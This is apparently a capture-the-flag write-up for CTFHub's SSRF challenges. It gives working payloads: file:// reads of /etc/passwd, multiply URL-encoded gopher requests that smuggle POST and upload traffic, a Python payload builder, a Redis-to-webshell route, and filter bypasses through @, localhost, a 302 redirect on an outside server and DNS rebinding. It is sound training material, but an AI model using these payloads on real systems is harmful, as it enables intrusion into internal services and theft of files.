ctfhub ssrf skill tree practice

Intranet Access#

This question is relatively simple, just access directly.

Pseudo Protocol Read File#

file pseudo protocol

First read /etc/passwd

Read the flag.php under the web directory

Port Scanning#

POST Request#

Try sending the following package with a GET request, and it returns the following content;

The question prompts to send a POST request, so the gopher protocol will be needed.

Construct the gopher payload based on the response package.

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=a80ea933ead842996c204517423ae75e

Encode the URL: https://www.bejson.com/enc/urlencode/, or use Burp's decode function.

After the first encoding, the content is as follows:

POST%20/flag.php%20HTTP/1.1%0AHost:%20127.0.0.1:80%0AContent-Type:%20application/x-www-form-urlencoded%0AContent-Length:%2036%0A%0Akey=200890c79882ceba049a7d02bee2ef1f

Replace %0A with %0D%0A

POST%20%2Fflag.php%20HTTP%2F1.1%0D%0AHost%3A%20127.0.0.1%3A80%0D%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A%2036%0D%0A%0D%0Akey%3D200890c79882ceba049a7d02bee2ef1f

Second encoding

POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253D200890c79882ceba049a7d02bee2ef1f

So the final payload is as follows:

?url=gopher://127.0.0.1:80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253D200890c79882ceba049a7d02bee2ef1f

Then send the request

File Upload#

Try accessing flag.php

http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php

No submission box, construct submit

Try using the file protocol to read the source code.

Based on the source code prompt, determine whether the file exists and is not empty, upload a txt file, and then capture the packet.

Before constructing the payload, it is necessary to remove Accept-Encoding: gzip, deflate.

POST /flag.php HTTP/1.1
Host: challenge-960f11fca71a9108.sandbox.ctfhub.com:10800
Content-Length: 281
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Referer: http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundarylrZVoi6bEshmiqB0
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: text/plain

111
------WebKitFormBoundarylrZVoi6bEshmiqB0
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundarylrZVoi6bEshmiqB0--

First perform the first encoding.

POST%20/flag.php%20HTTP/1.1%0AHost:%20challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%0AContent-Length:%20281%0ACache-Control:%20max-age=0%0AUpgrade-Insecure-Requests:%201%0AOrigin:%20http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%0AContent-Type:%20multipart/form-data;%20boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0%0AUser-Agent:%20Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/99.0.4844.74%20Safari/537.36%0AAccept:%20text/html,application/xhtml+xml,application/xml;q=0.9%0AReferer:%20http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%0AAccept-Language:%20zh-CN,zh;q=0.9%0AConnection:%20close%0A%0A------WebKitFormBoundarylrZVoi6bEshmiqB0%0AContent-Disposition:%20form-data;%20name=%22file%22;%20filename=%221.txt%22%0AContent-Type:%20text/plain%0A%0A111%0A------WebKitFormBoundarylrZVoi6bEshmiqB0%0AContent-Disposition:%20form-data;%20name=%22submit%22%0A%0A%E6%8F%90%E4%BA%A4%0A------WebKitFormBoundarylrZVoi6bEshmiqB0--

Replace %0A with %0D%0A, the replaced content is as follows:

POST%20/flag.php%20HTTP/1.1%0D%0AHost:%20challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%0D%0AContent-Length:%20281%0D%0ACache-Control:%20max-age=0%0D%0AUpgrade-Insecure-Requests:%201%0D%0AOrigin:%20http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%0D%0AContent-Type:%20multipart/form-data;%20boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0%0D%0AUser-Agent:%20Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/99.0.4844.74%20Safari/537.36%0D%0AAccept:%20text/html,application/xhtml+xml,application/xml;q=0.9%0D%0AReferer:%20http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%0D%0AAccept-Language:%20zh-CN,zh;q=0.9%0D%0AConnection:%20close%0D%0A%0D%0A------WebKitFormBoundarylrZVoi6bEshmiqB0%0D%0AContent-Disposition:%20form-data;%20name=%22file%22;%20filename=%221.txt%22%0D%0AContent-Type:%20text/plain%0D%0A%0D%0A111%0D%0A------WebKitFormBoundarylrZVoi6bEshmiqB0%0D%0AContent-Disposition:%20form-data;%20name=%22submit%22%0D%0A%0D%0A%E6%8F%90%E4%BA%A4%0D%0A------WebKitFormBoundarylrZVoi6bEshmiqB0--

Second encoding

POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:%2520challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%250D%250AContent-Length:%2520281%250D%250ACache-Control:%2520max-age=0%250D%250AUpgrade-Insecure-Requests:%25201%250D%250AOrigin:%2520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%250D%250AContent-Type:%2520multipart/form-data;%2520boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0%250D%250AUser-Agent:%2520Mozilla/5.0%2520(Windows%2520NT%252010.0;%2520Win64;%2520x64)%2520AppleWebKit/537.36%2520(KHTML,%2520like%2520Gecko)%2520Chrome/99.0.4844.74%2520Safari/537.36%250D%250AAccept:%2520text/html,application/xhtml+xml,application/xml;q=0.9%250D%250AReferer:%2520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%250D%250AAccept-Language:%2520zh-CN,zh;q=0.9%250D%250AConnection:%2520close%250D%250A%250D%250A------WebKitFormBoundarylrZVoi6bEshmiqB0%250D%250AContent-Disposition:%2520form-data;%2520name=%2522file%2522;%2520filename=%25221.txt%2522%250D%250AContent-Type:%2520text/plain%250D%250A%250D%250A111%250D%250A------WebKitFormBoundarylrZVoi6bEshmiqB0%250D%250AContent-Disposition:%2520form-data;%2520name=%2522submit%2522%250D%250A%250D%250A%25E6%258F%2590%25E4%25BA%25A4%250D%250A------WebKitFormBoundarylrZVoi6bEshmiqB0--

Third encoding

POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost:%252520challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%25250D%25250AContent-Length:%252520281%25250D%25250ACache-Control:%252520max-age=0%25250D%25250AUpgrade-Insecure-Requests:%2525201%25250D%25250AOrigin:%252520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%25250D%25250AContent-Type:%252520multipart/form-data;%252520boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AUser-Agent:%252520Mozilla/5.0%252520(Windows%252520NT%25252010.0;%252520Win64;%252520x64)%252520AppleWebKit/537.36%252520(KHTML,%252520like%252520Gecko)%252520Chrome/99.0.4844.74%252520Safari/537.36%25250D%25250AAccept:%252520text/html,application/xhtml+xml,application/xml;q=0.9%25250D%25250AReferer:%252520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%25250D%25250AAccept-Language:%252520zh-CN,zh;q=0.9%25250D%25250AConnection:%252520close%25250D%25250A%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AContent-Disposition:%252520form-data;%252520name=%252522file%252522;%252520filename=%2525221.txt%252522%25250D%25250AContent-Type:%252520text/plain%25250D%25250A%25250D%25250A111%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AContent-Disposition:%252520form-data;%252520name=%252522submit%252522%25250D%25250A%25250D%25250A%2525E6%25258F%252590%2525E4%2525BA%2525A4%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0--

Final payload

GET /?url=127.0.0.1/index.php?url=gopher://127.0.0.1:80/_POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost:%252520challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%25250D%25250AContent-Length:%252520281%25250D%25250ACache-Control:%252520max-age=0%25250D%25250AUpgrade-Insecure-Requests:%2525201%25250D%25250AOrigin:%252520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800%25250D%25250AContent-Type:%252520multipart/form-data;%252520boundary=----WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AUser-Agent:%252520Mozilla/5.0%252520(Windows%252520NT%25252010.0;%252520Win64;%252520x64)%252520AppleWebKit/537.36%252520(KHTML,%252520like%252520Gecko)%252520Chrome/99.0.4844.74%252520Safari/537.36%25250D%25250AAccept:%252520text/html,application/xhtml+xml,application/xml;q=0.9%25250D%25250AReferer:%252520http://challenge-960f11fca71a9108.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%25250D%25250AAccept-Language:%252520zh-CN,zh;q=0.9%25250D%25250AConnection:%252520close%25250D%25250A%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AContent-Disposition:%252520form-data;%252520name=%252522file%252522;%252520filename=%2525221.txt%252522%25250D%25250AContent-Type:%252520text/plain%25250D%25250A%25250D%25250A111%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0%25250D%25250AContent-Disposition:%252520form-data;%252520name=%252522submit%252522%25250D%25250A%25250D%25250A%2525E6%25258F%252590%2525E4%2525BA%2525A4%25250D%25250A------WebKitFormBoundarylrZVoi6bEshmiqB0-- HTTP/1.1
Host: challenge-960f11fca71a9108.sandbox.ctfhub.com:10800
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Double Encoding Script#

import urllib.parse
payload =\
"""POST /flag.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------224170729831654278414248977569
Content-Length: 525
Origin: http://challenge-fbeb7e53e47ecd22.sandbox.ctfhub.com:10800
Connection: close
Referer: http://challenge-fbeb7e53e47ecd22.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php
Upgrade-Insecure-Requests: 1

-----------------------------224170729831654278414248977569
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: application/octet-stream
-----------------------------224170729831654278414248977569
Content-Disposition: form-data; name="submit"

123
-----------------------------224170729831654278414248977569--
123
-----------------------------224170729831654278414248977569
Content-Disposition: form-data; name="submit"

123
-----------------------------224170729831654278414248977569--
"""

# Note that there must be a newline at the end, the newline indicates the end of the HTTP request
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)       # Here because it is a GET request, it needs to be encoded twice

Redis#

Check if there is a redis vulnerability

Use the Gopherus tool to generate the payload.

Perform double encoding through URL encoding website

Send the data packet

Webshell connection

URL Bypass#

It is prompted that access can only be made through http://notfound.ctfhub.com, which requires bypassing, and can be bypassed using the @ symbol.

http://challenge-393a59f384add707.sandbox.ctfhub.com:10800/?url=http://[email protected]/flag.php

Numeric IP Bypass#

The blacklist has banned 127 and 172., in this case, there are many bypass methods.

http://challenge-f066296bec5527d2.sandbox.ctfhub.com:10800/?url=http://0/flag.php
http://challenge-f066296bec5527d2.sandbox.ctfhub.com:10800/?url=http://localhost/flag.php

302 Redirect Bypass#

According to the question prompt, it is necessary to use 302 to bypass.

To use 302 bypass, it is necessary to set up HTTP and PHP services on the VPS server, and then create the following PHP file.


<?php
header("Location:http://127.0.0.1/flag.php");
?>

The final URL is

http://challenge-f066296bec5527d2.sandbox.ctfhub.com:10800/?url=http://1.116.2.18:8009/302.php

If there is no PHP environment, the code will be output as is.

Another way is to first obtain the source code.

It filtered

/127|172|10|192/

But did not filter localhost

DNS Rebinding Bypass#

Solve the problem through the website https://lock.cmpxchg8b.com/rebinder.html

This website will randomly point to one of the two internal IPs shown in the figure. Since the 127 segment is a loopback address, both IPs point to 127.0.0.1, and each can access localhost.

http://challenge-c3fc88b00a1e6234.sandbox.ctfhub.com:10800/?url=http://7f000001.7f000002.rbndr.us/flag.php

References:
CTFHub-SSRF-File Upload
CTFHUB-Skill Tree-Web-SSRF-File Upload
A Brief Discussion on DNS Rebinding Vulnerabilities